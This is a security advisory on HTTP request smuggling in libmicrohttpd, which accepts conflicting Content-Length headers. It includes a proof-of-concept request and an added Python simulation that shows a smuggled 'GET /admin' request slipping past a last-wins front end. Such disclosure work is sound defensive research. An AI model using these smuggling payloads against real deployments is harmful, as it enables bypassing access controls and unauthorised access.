-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2026-018
Product: libmicrohttpd
Manufacturer: GNU project
Affected Version(s): 1.0.2-2
Tested Version(s): 1.0.2-2
Vulnerability Type: CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
Risk Level: High
Solution Status: Fixed
Manufacturer Notification: 2026-04-07
Solution Date: 2026-04-13
Public Disclosure: 2026-04-16
CVE Reference: Not yet assigned
Author of Advisory: Nicola Staller, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The manufacturer describes the product as follows (see [1]):

"GNU libmicrohttpd is a small C library that makes it easy to run an HTTP server as part of another application. GNU Libmicrohttpd is free software and part of the GNU project."

Because it accepts requests that carry multiple Content-Length headers with differing values, libmicrohttpd is vulnerable to HTTP request smuggling.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

libmicrohttpd frames the request body using the first occurrence of the Content-Length header. When libmicrohttpd is deployed behind a front end (for example a reverse proxy or load balancer) that uses the last occurrence instead, the two components disagree on where one request ends and the next begins on a keep-alive connection, which is the condition for HTTP request smuggling.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Send an HTTP request with two different Content-Length headers such as the following. Note that line breaks are represented by the textual escape sequence "\r\n":

POST / HTTP/1.1\r\n
Host: \r\n
Connection: keep-alive\r\n
Content-Length: 9\r\n
Content-Length: Z\r\n
\r\n
test=test

Observe that the request is accepted and the 9-byte body is processed, indicating that the first Content-Length header was chosen and the second (invalid) one ignored. RFC 9112 [4], section 6.3, requires a recipient to treat a message with multiple Content-Length fields carrying differing values, or a single Content-Length field with an invalid value, as an unrecoverable framing error (a server must answer with 400 Bad Request and close the connection); RFC 9110 [5] defines the field's syntax. Accepting such requests violates both and leads to HTTP request smuggling if libmicrohttpd is used with a front end prioritizing the last occurrence of the Content-Length header.
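
To make the disagreement concrete, the following Python script frames one keep-alive byte stream under three policies: first-Content-Length-wins (the libmicrohttpd behaviour the advisory describes), last-wins (the hypothetical front end), and the strict RFC 9112 section 6.3 rule. It is an added example, not code from the advisory, from SySS or from libmicrohttpd. The host name "backend" and the smuggled path "/admin" are placeholders, and the second stream with two numeric lengths goes beyond the advisory's PoC to show where the smuggled request surfaces.

```python
"""Content-Length disagreement between first-wins, last-wins and strict parsers.

Constructed demonstration of the CWE-444 issue above; not libmicrohttpd or SySS
code. "backend" and "/admin" are placeholders.
"""
import re
from typing import Callable, List, Tuple

CRLF = b"\r\n"
Header = Tuple[bytes, bytes]


class FramingError(ValueError):
    """Message framing is invalid (RFC 9112, section 6.3)."""


def parse_head(stream: bytes) -> Tuple[bytes, List[Header], bytes]:
    """Split one request head off a byte stream: (request line, headers, remainder)."""
    end = stream.find(CRLF + CRLF)
    if end < 0:
        raise FramingError("incomplete request head")
    lines = stream[:end].split(CRLF)
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers, stream[end + 4:]


def content_length_values(headers: List[Header]) -> List[bytes]:
    """Every Content-Length value, expanding comma-separated lists (RFC 9110, section 8.6)."""
    values = []
    for name, value in headers:
        if name == b"content-length":
            values.extend(v.strip() for v in value.split(b","))
    return values


def _to_int(value: bytes) -> int:
    if not re.fullmatch(rb"[0-9]+", value):
        raise FramingError("invalid Content-Length value %r" % value)
    return int(value)


def pick_first(headers: List[Header]) -> int:
    """Lenient policy the advisory attributes to libmicrohttpd: first value wins."""
    values = content_length_values(headers)
    return _to_int(values[0]) if values else 0


def pick_last(headers: List[Header]) -> int:
    """Lenient policy of the hypothetical front end: last value wins."""
    values = content_length_values(headers)
    return _to_int(values[-1]) if values else 0


def pick_strict(headers: List[Header]) -> int:
    """RFC 9112 policy: differing or invalid values are an unrecoverable error."""
    values = content_length_values(headers)
    if not values:
        return 0
    lengths = {_to_int(v) for v in values}
    if len(lengths) != 1:
        raise FramingError("conflicting Content-Length values %r" % values)
    return lengths.pop()


def split_requests(stream: bytes, policy: Callable[[List[Header]], int]) -> List[bytes]:
    """Frame every request on a keep-alive connection; returns the request lines seen."""
    seen = []
    while stream:
        request_line, headers, rest = parse_head(stream)
        body_len = policy(headers)
        if len(rest) < body_len:
            raise FramingError("body truncated")
        seen.append(request_line)
        stream = rest[body_len:]
    return seen


FORM = b"test=test"
# Constructed: a second request hidden inside what the last-wins front end treats as body.
SMUGGLED = b"GET /admin HTTP/1.1" + CRLF + b"Host: backend" + CRLF + CRLF


def advisory_poc() -> bytes:
    """The advisory's PoC request, byte for byte (Host left empty as in the advisory)."""
    return (b"POST / HTTP/1.1" + CRLF + b"Host: " + CRLF + b"Connection: keep-alive" + CRLF
            + b"Content-Length: 9" + CRLF + b"Content-Length: Z" + CRLF + CRLF + FORM)


def smuggling_stream() -> bytes:
    """Same shape with two numeric values: 9 for the backend, 9 + len(SMUGGLED) for the front end."""
    return (b"POST / HTTP/1.1" + CRLF + b"Host: backend" + CRLF + b"Connection: keep-alive" + CRLF
            + b"Content-Length: %d" % len(FORM) + CRLF
            + b"Content-Length: %d" % (len(FORM) + len(SMUGGLED)) + CRLF + CRLF
            + FORM + SMUGGLED)


def desync_report(stream: bytes) -> dict:
    """How each policy frames the stream: the request lines seen, or the rejection reason."""
    report = {}
    for name, policy in (("first-wins", pick_first), ("last-wins", pick_last), ("strict", pick_strict)):
        try:
            report[name] = split_requests(stream, policy)
        except FramingError as exc:
            report[name] = "rejected: " + str(exc)
    return report


if __name__ == "__main__":
    for label, stream in (("advisory PoC", advisory_poc()), ("smuggling stream", smuggling_stream())):
        for policy_name, outcome in desync_report(stream).items():
            print(f"{label:17} {policy_name:10} {outcome}")
```

On the advisory's PoC the first-wins parser accepts the 9-byte body while the strict parser rejects the invalid value "Z". On the numeric stream the last-wins front end sees a single POST and forwards the whole 47-byte body, while the first-wins backend frames "GET /admin" as a second request that the front end never inspected; the strict parser refuses the message outright, which is the only safe answer on either side of the proxy. When testing a real deployment, send the PoC through the front end and watch for an extra response on the same connection, and verify the fix by confirming that the backend now closes the connection with 400 instead of processing the body.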
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Update to libmicrohttpd v1.0.4.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2026-03-19: Vulnerability discovered
2026-04-07: Vulnerability reported to manufacturer
2026-04-13: Patch released by manufacturer
2026-04-16: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for libmicrohttpd
    https://www.gnu.org/software/libmicrohttpd/
[2] SySS Security Advisory SYSS-2026-018
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2026-018.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy
[4] RFC 9112: HTTP/1.1
    https://www.rfc-editor.org/rfc/rfc9112.html
[5] RFC 9110: HTTP Semantics
    https://www.rfc-editor.org/rfc/rfc9110.html

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Nicola Staller of SySS GmbH.

E-Mail: nicola.staller@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Nicola_Staller.asc
Key ID: 0x9DF339F941DD2290
Key Fingerprint: A127 394A F398 B097 2332 637C 9DF3 39F9 41DD 2290

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 4.0
URL: https://creativecommons.org/licenses/by/4.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEoSc5SvOYsJcjMmN8nfM5+UHdIpAFAmneI8oACgkQnfM5+UHd
IpDfchAAhGKTSXphDBrHGBpPjSVP3b4FNCgKdrgLdD0QieUPQBycM6P+o85BXXCA
xrhWBkeQ+hv1KJLuyQhs/VUbCi2IvuWI0xh9AgcYGhwMHBOozYsp6or96QZ9VTvo
7CQDr3eV82xpbrGIXH7uE0yJAAA9aOqRDTwjqg2NPK5uGPJOGlDPPUFoYds0Guiz
gtlnxdLiUOFC7jOdosHL133jnC0//EVXAXeKQwbVtRL0eP1aL5O/3Yk3UMCPW/3x
M51iPlU8aRd0+2i2/vs86q6zn3V/DO5JJhr8O1AF+y66IrpCEBo6aYTADASIaAF7
CpxRhFmFUA0XrlAEO+QolbxImc74DRoyqEtCLfPMp5g8DU09u7A4lfQ68N8IV9m1
e2j3kHKO8OYceis/elD1xjNI9M7comly3pjxHIgCtno3U4x/345WNLZx1wfNYIxw
QwrTrCLr0nA9N5bniZNr0Y5NexUz3c6hzITYq/Fv7EOOeRAoXq93rqkv2m1c+FyH
Sd/pe4Q1qiq0wCQN4hmO2EiSklpSs14oaZyjmRUGHYPKgDnBIDoK5crM24CGCMdn
Pt0O10L0uTICKqvR1gJcpzsksMNKMWK/OFJSqyZ9zqTQn4jkmvZddC1zUSq3/RJp
eAX6iQQAnEzrP9Idl3czC+DCxb2LcirEUJCLO5f4v7ADhFfz1A4=
=BS81
-----END PGP SIGNATURE-----